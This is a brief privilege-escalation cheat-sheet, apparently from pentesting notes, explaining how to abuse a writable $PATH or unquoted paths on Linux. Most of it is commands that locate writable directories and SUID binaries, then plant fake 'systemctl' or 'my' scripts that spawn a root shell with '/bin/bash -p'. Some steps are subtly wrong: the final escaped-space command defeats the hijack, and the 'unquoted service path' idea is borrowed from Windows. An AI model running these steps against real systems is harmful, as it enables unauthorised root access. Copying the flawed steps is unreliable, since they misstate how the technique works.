Path Abuse
Path abuse occurs when a misconfigured $PATH environment variable or unquoted paths in scripts/services allow an attacker to execute unintended binaries with elevated privileges.
How To?
-
Check PATH for writable directories
echo $PATH # List PATH directories
find $(echo $PATH | tr ':' ' ') -writable -type d 2>/dev/null # Find writable dirs -
Look for commands run as root (Sudo/SUID scripts/services)
sudo -l # Check sudo permissions
find / -perm -4000 -type f 2>/dev/null # Find SUID binaries -
Exploit Unquoted Service Paths (If a script runs with root privileges)
systemctl list-units --type=service | grep enabled # Find services
cat /etc/systemd/system/<service>.service # Check ExecStart path -
Hijack Path Execution
-
Create a malicious binary/script in a writable PATH directory
echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/systemctl
chmod +x /tmp/systemctl
export PATH="/tmp:$PATH"
sudo systemctl restart <target_service> -
If unquoted paths exist (e.g.,
/usr/local/bin/my script.sh), create a binary namedmyin/usr/local/binecho -e '#!/bin/bash\n/bin/bash -p' > "/usr/local/bin/my"
chmod +x "/usr/local/bin/my"
sudo /usr/local/bin/my\ script.sh
-